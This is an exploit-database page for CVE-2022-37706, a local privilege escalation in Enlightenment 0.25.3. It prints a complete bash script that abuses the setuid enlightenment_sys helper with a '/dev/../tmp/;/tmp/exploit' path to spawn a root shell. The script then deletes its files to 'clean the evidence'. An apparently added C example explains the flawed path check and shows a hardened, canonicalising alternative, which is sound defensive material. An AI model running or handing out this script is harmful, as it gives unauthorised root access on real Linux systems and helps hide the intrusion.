## https://sploitus.com/exploit?id=PACKETSTORM:170339
## Title: Enlightenment Version: 0.25.3 LPE  
## Author: nu11secur1ty  
## Date: 12.26.2022  
## Vendor: https://www.enlightenment.org/  
## Software: https://www.enlightenment.org/download  
## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706  
  
## Description:  
Enlightenment version 0.25.3 is vulnerable to local privilege escalation.  
enlightenment_sys in Enlightenment before 0.25.4 allows local users to  
gain privileges because it is setuid root,  
and the system library function mishandles pathnames that begin with a  
/dev/.. substring.  
An attacker with local access to a machine on which Enlightenment is  
installed can use this vulnerability to do very dangerous stuff.  
  
## STATUS: CRITICAL Vulnerability  
  
## Tested on:  
```bash  
DISTRIB_ID=Ubuntu  
DISTRIB_RELEASE=22.10  
DISTRIB_CODENAME=kinetic  
DISTRIB_DESCRIPTION="Ubuntu 22.10"  
PRETTY_NAME="Ubuntu 22.10"  
NAME="Ubuntu"  
VERSION_ID="22.10"  
VERSION="22.10 (Kinetic Kudu)"  
VERSION_CODENAME=kinetic  
ID=ubuntu  
ID_LIKE=debian  
HOME_URL="https://www.ubuntu.com/"  
SUPPORT_URL="https://help.ubuntu.com/"  
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"  
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"  
UBUNTU_CODENAME=kinetic  
LOGO=ubuntu-logo  
```  
  
[+] Exploit:  
  
```bash  
#!/usr/bin/bash  
# Idea by MaherAzzouz  
# Development by nu11secur1ty  
  
echo "CVE-2022-37706"  
echo "[*] Trying to find the vulnerable SUID file..."  
echo "[*] This may take few seconds..."  
  
# The actual problem  
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)  
if [[ -z ${file} ]]  
then  
echo "[-] Couldn't find the vulnerable SUID file..."  
echo "[*] Enlightenment should be installed on your system."  
exit 1  
fi  
  
echo "[+] Vulnerable SUID binary found!"  
echo "[+] Trying to pop a root shell!"  
mkdir -p /tmp/net  
mkdir -p "/dev/../tmp/;/tmp/exploit"  
  
echo "/bin/sh" > /tmp/exploit  
chmod a+x /tmp/exploit  
echo "[+] Welcome to the rabbit hole :)"  
  
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net  
  
read -p "Press any key to clean the evidence..."  
echo -e "Please wait... "  
  
sleep 5  
rm -rf /tmp/exploit  
rm -rf /tmp/net  
echo -e "Done; Everything is clear ;)"  
  
```  
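The description says enlightenment_sys mishandles pathnames that begin with a /dev/.. substring, and the mount argument in the script above shows the shape such a pathname takes. The C program below is an added illustration written for this page, not Enlightenment's own code: it contrasts a plain prefix check of the kind the description implies with a hardened check that lexically canonicalises the path first, then requires the result to sit under /dev and to contain no shell metacharacters. The function names `naive_is_dev_path`, `normalize_path` and `safe_is_dev_path` and the sample paths are the example's own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Naive check: a bare prefix compare. An input such as
   "/dev/../tmp/x" passes because it literally starts with "/dev/". */
int naive_is_dev_path(const char *path) {
    return strncmp(path, "/dev/", 5) == 0;
}

/* Lexically normalize an absolute path into out (capacity outsz):
   collapse repeated '/', drop "." components and pop one component
   for each "..". Returns 0 on success, -1 if the path is not absolute
   or out is too small. It never touches the filesystem, so it can be
   applied to untrusted input before anything is opened. */
int normalize_path(const char *path, char *out, size_t outsz) {
    if (path[0] != '/' || outsz < 2) return -1;
    size_t len = 1;
    out[0] = '/';
    const char *p = path;
    while (*p) {
        while (*p == '/') p++;          /* skip one or more separators */
        if (!*p) break;
        const char *start = p;
        while (*p && *p != '/') p++;    /* find the end of this component */
        size_t clen = (size_t)(p - start);
        if (clen == 1 && start[0] == '.') continue;
        if (clen == 2 && start[0] == '.' && start[1] == '.') {
            /* pop the previous component; "/.." stays at "/" */
            while (len > 1 && out[len - 1] != '/') len--;
            if (len > 1) len--;         /* drop the separator of the popped component */
            continue;
        }
        if (len > 1) {
            if (len + 1 >= outsz) return -1;
            out[len++] = '/';
        }
        if (len + clen >= outsz) return -1;
        memcpy(out + len, start, clen);
        len += clen;
    }
    out[len] = '\0';
    return 0;
}

/* Hardened check: canonicalise, then require the result to live under
   /dev and to be free of characters a later shell invocation could
   interpret (the page's payload contains ';'). */
int safe_is_dev_path(const char *path) {
    char norm[4096];
    if (normalize_path(path, norm, sizeof norm) != 0) return 0;
    if (strncmp(norm, "/dev/", 5) != 0) return 0;
    if (strpbrk(norm, ";&|`$<>\\\"'\n") != NULL) return 0;
    return 1;
}

int main(void) {
    /* constructed sample inputs: two legitimate device paths and the
       traversal shape described on this page */
    const char *samples[] = {
        "/dev/sdb1",
        "/dev/./disk/../sdb1",
        "/dev/../tmp/;/tmp/exploit",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        char norm[256];
        if (normalize_path(samples[i], norm, sizeof norm) != 0)
            strcpy(norm, "<invalid>");
        printf("%-28s naive=%d safe=%d canonical=%s\n", samples[i],
               naive_is_dev_path(samples[i]), safe_is_dev_path(samples[i]), norm);
    }
    return 0;
}
```

The normalisation is deliberately filesystem-free so that it can run on untrusted input before any file is opened; for an existing device node, realpath(3) additionally resolves symlinks and is the better final check. The stronger fix for a setuid helper is not to hand user-controlled strings to system(3) at all, but to execve the mount binary with a fixed argv so that no shell ever parses the path.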
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)  
## Proof and Exploit:  
[href](https://streamable.com/zflbgg)  
  
## Time spent  
`01:00:00`